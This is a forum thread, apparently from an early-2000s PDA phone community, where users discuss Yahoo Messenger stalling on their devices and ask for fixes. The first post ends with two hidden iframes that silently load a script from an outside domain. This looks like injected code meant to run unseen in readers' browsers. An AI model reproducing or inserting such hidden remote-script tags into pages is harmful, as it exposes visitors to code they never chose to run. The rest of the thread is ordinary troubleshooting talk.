+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User
    Join Date
    11-22-2001
    Posts
    53

    Yahoo Messenger stopped working?

    Hi,

    Just wondering if anyone has observed that Yahoo Messenger is no longer functioning. I can get all the way to retrieving my Friends List, but than the screen stalls (and requires soft reset of the phone or stay connected for some 5 minutes). However, when I tried it using an emulator on my PC, it worked.... Any idea?
    Thanks,
    Charlie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    11-27-2001
    Location
    CT
    Posts
    25

    Re: Yahoo Messenger

    I've noticed the same thing!
    It doesn't lock up as long, but still annoying!
    It's probably been for a week now.

  3. #3
    Registered User
    Join Date
    10-22-2001
    Location
    Texas - Dallas area
    Posts
    137

    Me too!!

    Yep, I've also noticed this. I happened across this post, and am glad that I'm not alone. I don't see much happening to fix this, as Yahoo hasn't done a lot, in my opinion, to improve the slow-ness of the Graffiti input when using Messenger (it wan't like that for me when I used Omnisky with my Palm Vx). Therefore, I wouldn't think they'll be hopping right on this latest issue.
    I wondered if it might be the Verizon network - for the other posters, are you guys on SPCS or Verizon?

  4. #4
    Registered User
    Join Date
    11-22-2001
    Posts
    53
    I'm on Sprint. I was thinking that it might be Sprint rather than Yahoo, as it still works fine on my Emulator.
    Re: input speed. I actually have many shortcuts created, and use them to to speed up my input process.
    - Charlie

  5. #5
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    i believe we all are on sprint... the i300'ers anyway...


    i had lag times when using the messegner on the 6035.. i have not tried it on the i300 yet.. :p

  6. #6
    Registered User
    Join Date
    11-22-2001
    Posts
    53
    Hmm.. Service is back. Turns out to be a Yahooo issue.

  7. #7
    Registered User
    Join Date
    12-17-2001
    Posts
    35
    I've noticed over the course of the last year that both the PDA and WAP pages at the Yahoo site frequently are "down"; on some occasions you get an error message to the effect that there is a problem with the login database, sometimes there is just no reply at all or a timeout when trying to login into Yahoo Messenger or retriving your Friends lists.

    Some times this appears to go on for a couple of days....I've emailed Yahoo tech support, but not got any meaningful reply....

  8. #8
    Registered User
    Join Date
    05-15-2005
    Location
    phoenix
    Posts
    1

    yahoo messenger not working

    man it sucks wen i click on my yahoo messenger to sign in it doesnt even do anything i hate it.it doesnt go to anything .do u guys got any advice for me

  9. #9
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    ummm what program are you using?

  10. #10
    Registered User
    Join Date
    08-06-2005
    Location
    guess
    Posts
    1
    Even i have the same prob. when i click on the y messenger icon nothing happens. i am going crazy now. i uninstalled and reinstalled the programe but still nothing happens. i have downloaded the latest version but no luck . nothing hapens. i am using XP. plz help me. send me the solution to the.rishi@rediffmail.com. plz. its urgent. Thank you all
    The Rishi ;)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts